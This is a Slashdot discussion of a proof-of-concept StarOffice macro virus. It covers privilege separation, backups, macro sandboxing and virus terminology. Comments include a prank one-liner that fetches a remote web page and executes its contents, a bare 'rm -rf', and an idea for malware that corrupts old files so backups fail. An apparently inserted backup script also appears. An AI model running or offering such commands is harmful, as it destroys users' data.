First StarOffice Virus Sighted
Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."
it's still basically a OS security issue (Score:3, Interesting)
First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?
Regardless, it's no secret or mystery: even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.
OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.
Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)
Re:it's still basically a OS security issue (Score:5, Insightful)
We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.
Re:it's still basically a OS security issue (Score:2)
Re:it's still basically a OS security issue (Score:3, Funny)
Not my frozen bubble scores!!!!!!1 (Score:2)
Re:it's still basically a OS security issue (Score:2)
Re:it's still basically a OS security issue (Score:4, Insightful)
But even if you did backup every night, what if some malware corrupted some documents in
Re:it's still basically a OS security issue (Score:2)
2) I keep dailies for a week and monthlies essentially forever, i.e. burned to CD/DVD. Not perfect, but I wouldn't be totally hosed.
Re:it's still basically a OS security issue (Score:2)
99.9% of the time the backup doesn't capture any interesting changes, but you never know.
Losing data is always the real problem. (Score:4, Informative)
It's always about the security of the data.
Which is why part of the OS's job is to restrict the ability of regular users as much as possible.
When all that is in danger is your personal home directory, that's really as good as the OS can be.
If we're talking single user/home machines
Re:Losing data is always the real problem. (Score:2)
No, as GP said, the security of Information is more important. If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.
Re:Losing data is always the real problem. (Score:2)
Let's say that you and I both get some bit of malware, you on WinXP (where there's a 99.44% chance your account has Administrator privs), and me on Linux, logged in as "ron", who doesn't have root privs.
How do we recover?
You must reinstall WinXP and every application, then all data. Much time (2 weeknight
Re:it's still basically a OS security issue (Score:2)
It really isn't. Any user who cares about their stuff both should and could back up $HOME every night; it's small, and the delta set is even smaller, so backing up is fast and cheap. Any user who cares about their stuff should, but often cannot, back up / every night, purely due to practical issues.
Moreover, when $HOME gets wiped, you just have to lay your data back down -- call it ten minutes if you do a complete backup nightly to a DVD, or half an h
Re:it's still basically a OS security issue (Score:5, Interesting)
Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as
I don't, nor do I know anyone that does, back up their
What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but
I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.
I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in
-Charles
Re:it's still basically a OS security issue (Score:2)
I did this more to be able to track a change in code incase something happened. This should
Meet my mother (Score:2, Interesting)
My mom works on a (OS X) Mac (small home office), so far safe as houses as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day basis, i.e. every day of the week her user-directory is written to a different backup-set on a separate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?
It may seem like overkill, but I set t
Re:it's still basically a OS security issue (Score:2, Informative)
Re:it's still basically a OS security issue (Score:2)
More importantly, compared to the mess that we have on windows, it can be trivial to remove spyware. A simple command can do it. For example:
# interactively remove every executable file owned by the current user ($ME)
find / -user "$ME" -type f -perm /u+x -exec rm -i {} \;
So even though a virus in userland can do serious damage, it is in a more vulnerable pos
Re:it's still basically a OS security issue (Score:2)
I would have to disagree. It is much, much easier to (backup and) recover $HOME with the appropriate precautions than to tune an OS for optimal performance.
On my machine, an automatic, periodic backup is made of $HOME by a cron job to my other disk (which requires root access). With only userland privileges, no virus will be able to get to that backup. Restoring a backup is as simple as a tar xvfz
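The root-run nightly backup described above, as an added shell example that is not the commenter's own script: it snapshots $HOME into a directory the user account cannot write, keeps a week of dailies, and records a checksum manifest per snapshot so two nights can be diffed to find documents a macro rewrote silently. It assumes GNU tar, findutils and coreutils; the paths, function names and the optional label argument are mine.

```shell
#!/bin/sh
# Added example (not from the thread). Run from root's crontab, e.g.:
#   backup_home /home/ron /backup/ron 7
# Assumption: /backup is on a disk only root can write, so code running
# as the user (a macro, a downloaded script) cannot touch the copies.
set -e

# backup_home SRC DEST [KEEP] [LABEL]
# Writes DEST/home-LABEL.tgz and DEST/home-LABEL.sha256, then deletes all
# but the newest KEEP snapshots. LABEL defaults to a timestamp; passing
# one explicitly gives deterministic names (used by the tests).
backup_home() {
    src=$1; dest=$2; keep=${3:-7}
    stamp=${4:-$(date +%Y%m%d-%H%M%S)}
    mkdir -p "$dest"
    chmod 700 "$dest"
    # Manifest first: a sorted "hash  ./path" list of every regular file.
    ( cd "$src" && find . -type f -print0 | sort -z | xargs -0 -r sha256sum ) \
        > "$dest/home-$stamp.sha256"
    tar czf "$dest/home-$stamp.tgz" -C "$src" .
    # Rotation: names sort chronologically, so drop everything but the
    # last $keep archives together with their manifests.
    ls -1 "$dest"/home-*.tgz | sort | head -n -"$keep" | while read -r old; do
        rm -f "$old" "${old%.tgz}.sha256"
    done
    printf '%s\n' "$dest/home-$stamp.tgz"
}

# restore_home ARCHIVE DEST: lay the data back down (the "tar xvfz" step).
restore_home() {
    mkdir -p "$2"
    tar xzf "$1" -C "$2"
}

# changed_files OLD_MANIFEST NEW_MANIFEST: print paths whose hash differs
# between the two snapshots or that only exist in the newer one. This is
# the check for the "virus quietly changed figures in my documents" case:
# run it before a bad snapshot gets rotated into the only copy you have.
changed_files() {
    sort "$1" > "$1.sorted"; sort "$2" > "$2.sorted"
    comm -13 "$1.sorted" "$2.sorted" | sed 's/^[0-9a-f]*  //'
    rm -f "$1.sorted" "$2.sorted"
}
```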
Re:it's still basically a OS security issue (Score:2)
I've got data so scattered around my hard drive that there's no hope of doing any sort of reasonable backup right now for instance. It's my failing, and some time when I have time I plan to go through and sort stuff out, but right now if I lose my data you might as well toss my computer off the roof.
No, it's not. (Score:2)
Re:it's still basically a OS security issue (Score:2)
I think you're missing the point. Sure, for most users, losing $HOME is as good as losing their entire harddrive. But $HOME can be very easily backed up - some distros can even be set up to do an automatic backup for you. Or, if you're really paranoid, you could even run StarOffice with its very own user. The tools to protect i
Re:it's still basically a OS security issue (Score:2)
That depends on what you keep in $HOME.
Personally, I keep my data on a separate partition mounted on, say,
Most of what's in my home directory is just stuff I've downloaded and my Gnome/KDE settings, etc. If I lose those, the system will just recreate them. Big deal. So I have to go in and click on a few dia
Re:it's still basically a OS security issue (Score:2)
Once more for this response can't hurt, either: losing one user's $HOME is far less serious than losing every home directory on the box plus the box itself maliciously attacking other parts of the network.
Re:Virus Spreading Problem... (Score:2)
It would be useful to know whether OOo BASIC can get out of the OOo sandbox and access the live system.
Re:it's still basically a OS security issue (Score:3, Interesting)
Regardless, it's no secret or mystery: even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.
I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficie
Re:it's still basically a OS security issue (Score:3, Interesting)
Re:it's still basically a OS security issue (Score:3, Insightful)
Re:it's still basically a OS security issue (Score:3, Insightful)
There's plenty of blame to go around, but it points out a general clue: writing secure generalize
Re:it's still basically a OS security issue (Score:2)
Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).
I fault the OS for not giving sufficient granularity of permissions for applications. The user should decide if the program gets access to sockets, and if they are real sockets or virtual ones. It should also have reasonable defaults that let the user decide if their word processor can access the internet or open
Re:it's still basically a OS security issue (Score:2)
Appropriate "sandbox" security model depends on what an application is supposed to be doing; any application that provides a scripting facility ought to provide an appropriate internal security model as well. Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that, or unless
Re:it's still basically a OS security issue (Score:2)
Appropriate "sandbox" security model depends on what an application is supposed to be doing
Agreed, but a reasonable default should be applied to any software installed and can be modified to become less restrictive as the user tries to use it for more tasks and approves more uses for it.
Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that
I very much agree.
P.S. the blockquote tag is n
Re:it's still basically a OS security issue (Score:5, Insightful)
Re:it's still basically a OS security issue (Score:2)
Flood, fire, virus, crash. Really doesn't matter, gone is gone.
Now what's more dangerous is a virus/script that changes figures and words in documents. It's likely you'll overwrite your backups and only have corrupt information.
Hmm, here is an idea, only have the virus corrupt data on files that have not been accessed in the last (x) days, 30 to 60 sounds like a good number, by the time most people notice it will be too late.
Re:it's still basically a OS security issue (Score:2)
Sort of. There is a "security" setting in the preferences that is set to "medium" by default, meaning that macros will require confirmation before they execute unless they are from a trusted source. No trusted sources are defined by default.
Of course lots of users will agree to pretty much anything the machine asks (the website wants to steal all your money and reformat your disk bef
Re:it's still basically a OS security issue (Score:2)
I wish I could add you to my friends list.
Missing the best part. (Score:3, Funny)
Re:Missing the best part. (Score:2)
goatse (Score:5, Funny)
be careful what you wish for... the 'adult content' could be goatse
Re:Missing the best part. (Score:2)
i thought that free pr0n was a feature
Virus!? (Score:5, Funny)
I don't call that a virus, I call it a feature.
Hopefully the next version will allow you to enter keywords to guide the image downloader.
Re:Virus!? (Score:3, Interesting)
Speaking of features, apparently StarBasic has the ability to download content from the internet, and - get this - StarOffice has the ability to DISPLAY IMAGES.
I knew it was insecure.
Re:Virus!? (Score:2)
Re:Virus!? (Score:4, Funny)
What, no screenshots?
Re:Virus!? (Score:2)
Look! It must be a virus. Oh yeah, Star Office. They don't have viruses, you say? Well, it must be the first one ever.
virus? (Score:5, Funny)
That's no virus, that's a productivity tool!
A Virus (Score:4, Insightful)
No malicious code (Score:3, Insightful)
Re:A Virus (Score:4, Insightful)
An actual virus which utterly cripples Windows PC's is discovered in the wild: Business as usual.
That's pretty much all you need to know about Windows and MS-Office.
Re:A Virus (Score:2)
Re:A Virus (Score:2)
Re:A Virus (Score:2)
Re:A Virus (Score:2)
Re:A Virus (Score:2)
Re:A Virus (Score:3, Interesting)
lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec
Re:A Virus (Score:2)
what we all want to know... (Score:2)
I doubt this is really going to turn into anything major though, Star still has security through obscurity. MS office is taking all the hits on the macro virus front.
I'm actually fairly pleased that they have done this though, it will make people look further and work to make it even more secure
Learning period (Score:5, Insightful)
It will also require tough and down-to-the-ground tough work such as researching the worms out there and patching the product out.
Another thing is: you can never "fix" the user, there will always be the guys to run attached executables that promise hot porn and FREE MONY!.
Re:Learning period (Score:2, Funny)
Re:Learning period (Score:2)
Not so easy, don't forget that the patches have to be reviewed by some central authority (like the guys that started the product? dunno), otherwise it'll be just as easy to sneak in a backdoor or a whole tro
Re:Learning period (Score:2, Insightful)
Re:Learning period (Score:2)
$ apt-cache show openoffice.org-writer
Package: openoffice.org-writer
Installed-Size: 10944
Version: 2.0.2-3
Size: 4945590
5 MB download, 10 MB install. Not that painful really.
POC != virus (Score:2, Insightful)
proof of concept is not a virus, sure it could be, but until it's in the wild it's not really
Why go through the trouble? (Score:4, Interesting)
Where is the "proof" (and the "virus") in this "proof of concept virus"?
Re:Why go through the trouble? (Score:3, Insightful)
Re:Why go through the trouble? (Score:3, Insightful)
The "proof of concept" (Score:2)
Re:Why go through the trouble? (Score:3, Informative)
Bypass mechanism (Score:3, Insightful)
I'm all for protecting users from their own stupidity, but in the end, there's a point where people stop having any power at all.
Re:Bypass mechanism (Score:2)
Running macros in a word-processor document shouldn't (by default) be "all-or-nothing"; they ought to run in a secure sandbox that requires user intervention to perform dangerous tasks like, say, modifying the global template (or, arguably, any external file), even if the user account has permission to run them.
Nice! (Score:2)
Re:Nice! (Score:2)
It is my experience that stuff like this is only spread through "adult images"... they just go to what sells, and evidently on the internet, that's pr0n
Whoosh! (Score:2)
Re:Nice! (Score:2)
Bad terminology. Not a virus. (Score:2)
This so-called virus, therefore, is just a trojan.
Re:Bad terminology. Not a virus. (Score:2)
Re:Bad terminology. Not a virus. (Score:2)
rm -rf
Re:Bad terminology. Not a virus. (Score:2)
Re:Bad terminology. Not a virus. (Score:2)
Any document format with a scripting facility provides the capacity to run a script on the client machine when a user opens a document. If that's all it takes to have a "virus", then every macro is a "virus".
Proof of Concept to infect the planet (Score:5, Interesting)
In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.
Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level than any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.
Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.
Re:Proof of Concept to infect the planet (Score:3, Informative)
The reason this won't work is that multicast is blocked by a large percentage of edge routers. Without widescale use of multicast, your PoC would cause little harm. We don't have widescale use of multicast...as one could figure out from the fact you felt it necessary to include a DEFINITION of multicast in your post...assumin
Re:Proof of Concept to infect the planet (Score:2)
The most important blockage to multicast, according to someone I know who worked at AT&T, is that ISPs don't know how to bill for it.
If you're a customer of AT&T and you send 1 packet into AT&T's network, and it causes 20 packets to leave AT&T's network, AT&T (and other major ISPs) don't have any facilities to bill you for that, and can't even decide if you're
Re:Proof of Concept to infect the planet (Score:2)
Not a lot, since it is NOT A VIRUS. It doesn't infect any system files, nor can it reproduce itself. Read the other comments above.
Erh... no, boss, erh... no, that wasn't me (Score:5, Funny)
A heartfelt THANK YOU to the author!
Re:Erh... no, boss, erh... no, that wasn't me (Score:2)
Thanks! (Score:3, Funny)
Cool... Thanks for the idea!
Respectfully Signed,
Anonymous Redmond Washington Resident
"Announcement" unconnected to Kaspersky's products? (Score:2)
Kaspersky has products for Linux file servers and mail servers -- although I cannot find anything beyond a price on their website, so perhaps what they have is a product that checks for Windows viruses but happens to run under Linux.
OpenOffice too! (Score:3, Informative)
Yawn (Score:2, Interesting)
Proof of security (Score:3, Insightful)
Is this really a virus? (Score:4, Insightful)
Re:Is this really a virus? (Score:2)
It doesn't, macros are of the "Trojan" variety. Personally, I think we should call the whole virus/worm/trojan category "Internet Transmitted Diseases", or ITDs for short, so that they're scarier to the non-tech crowd.
Re:Is this really a virus? (Score:2)
hm.. (Score:2, Informative)
Just because all it does is download porn, doesn't mean that it couldn't download a shell script that wipes out the MBR on your hard disk.
Re:hm.. (Score:2)
OTOH, it also doesn't demonstrate that it could download such a shell script and cause it to be executed without user intervention.
So it's not really a "proof of concept" as regards that particular capacity at all. The fact that it doesn't show that you can't do it is meaningless; that tells you nothing you didn't know without the so-called "proof of concept".
Re:hm.. (Score:2)
No need to worry (Score:5, Funny)
Re:No need to worry (Score:2)
"To both users of Open Office. I'll bet they're shaking in their boots!"
sootman (158191) on Thursday June 01, @05:59PM - Modded +5 funny:
"Both StarOffice users have been contacted and were warned to be careful."
Which just goes to prove (Score:2)
That publishing or distributing information in *any* 'word processor' format is just silly. The only time you should send or accept a 'word processor' format file from anyone is when you are specifically collaborating with that person to co-produce that document, and you have agreed in advance to use that specific format.
And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the co
Re:Which just goes to prove (Score:2)
Good luck convincing people to give up Word for TeX, sensible as your idea is.